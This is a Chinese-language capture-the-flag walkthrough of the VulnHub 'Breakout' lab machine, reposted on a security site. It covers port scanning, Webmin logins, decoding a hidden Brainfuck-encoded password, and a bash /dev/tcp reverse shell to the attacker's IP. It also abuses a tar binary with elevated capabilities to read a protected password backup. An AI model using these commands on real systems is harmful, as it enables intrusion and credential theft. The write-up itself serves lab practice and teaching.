breakout

admin
admin
admin
142269
文章
117
评论
2025年5月30日01:10:57评论7 views字数 2247阅读7分29秒阅读模式

下载地址:https://download.vulnhub.com/empire/02-Breakout.zip

攻击者IP:172.17.120.129 nat vmare

受害者IP:172.17.120.135 nat vmare

参考:https://www.cnblogs.com/sainet/p/15682132.html#3-10000-%E7%AB%AF%E5%8F%A3

https://blog.csdn.net/weixin_44830645/article/details/122675426

主机发现

breakout

端口扫描

breakout

80端口主页是apache默认页面

breakout

目录扫描也是没有收获

breakout

10000和20000端口是Webmin

10000版本1.981

20000版本1.830

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作http://www.webmin.com/Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。

CVE-2019-15107漏洞,该漏洞存在于Webmin 1.920及以下版本的password_change.cgi文件中,允许攻击者在未进行充分输入验证的情况下执行恶意代码。

漏洞利用url是修改密码功能password_change.cgi,且需要开启密码修改功能(1.890默认开启此功能)。

breakout

我正在尝试浮现这个漏洞,但是我失败了

参考:https://cloud.tencent.com/developer/article/1511916

https://www.freebuf.com/articles/web/266345.html

breakout

breakout

看一下其他师傅的wp,原来首页有注释,Ook编码

don't worry no one will get here, it's safe to share with you my access. Its encrypted 

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

breakout

https://ctf.bugku.com/tool/brainfuck

可能是密码,.2uqPEfj3D     <P'a-3< span></P'a-3<>

breakout

发现用户名cyber

enum4linux 172.17.120.135

breakout

20000成功登录

cyber/.2uqPEfj3D     <P'a-3< span>      </P'a-3<>

点击左下角的终端按钮可以执行命令

breakout

反弹shell

/bin/bash -i 5<> /dev/tcp/172.17.120.129/1111 0<&5 1>&5 2>&5

breakout

breakout

获得用户的flag

breakout

发现tar 可以读取任意文件

getcap -r / 2>/dev/null 命令用于递归地列出从根目录开始的所有文件及其所分配的 Linux 能力

breakout

使用find命令查找全局备份文件

find / -type f ( -name "*.bak" -o -name "*.backup" -o -name "*.bkp" ) 2>/dev/null

find /:从根目录开始搜索。这意味着会搜索整个文件系统,所以需要注意权限和性能开销。

-type f:只查找文件,忽略目录。

( -name ".bak" -o -name ".backup" -o -name ".bkp" ): -name ".bak":匹配名称以 .bak 结尾的文件。             -o:逻辑“或”的操作符,指定多个文件名匹配条件。             -name ".backup" 和 -name ".bkp":同理,匹配其他常见的备份文件后缀。             使用 ( 和 ) 包裹起来,让 find 能够正确处理多个条件。

2>/dev/null:将错误输出重定向到 /dev/null,目的是忽略因权限不足而无法访问某些文件或目录时的错误消息。

发现文件/var/backups/.old_pass.bak

但是权限不足

breakout

./tar -cvf pass.tar /var/backups/.old_pass.bak

-cvf:-c:创建一个新的归档。-v:显示详细信息(verbose),处理文件时会列出文件名。-f pass.tar:指定输出文件名为 pass.tar。/var/backups/.old_pass.bak:这个是被归档的实际文件或路径,文件位于 /var/backups 下,文件名为 .old_pass.bak。

这个命令的作用是将 /var/backups/.old_pass.bak 文件压缩并保存到名为 pass.tar 的 tar 归档文件中

tar -xvf pass.tar

-xvf:-x:从归档文件中提取内容。-v:显示详细信息,列出正在提取的文件。-f pass.tar:指定要提取的归档文件名为 pass.tar。

cat var/backups/.old_pass.bak获得密码Ts&4&YurgtRX(=~h

breakout

原文始发于微信公众号(王之暴龙战神):breakout

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月30日01:10:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   breakouthttps://cn-sec.com/archives/3948322.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息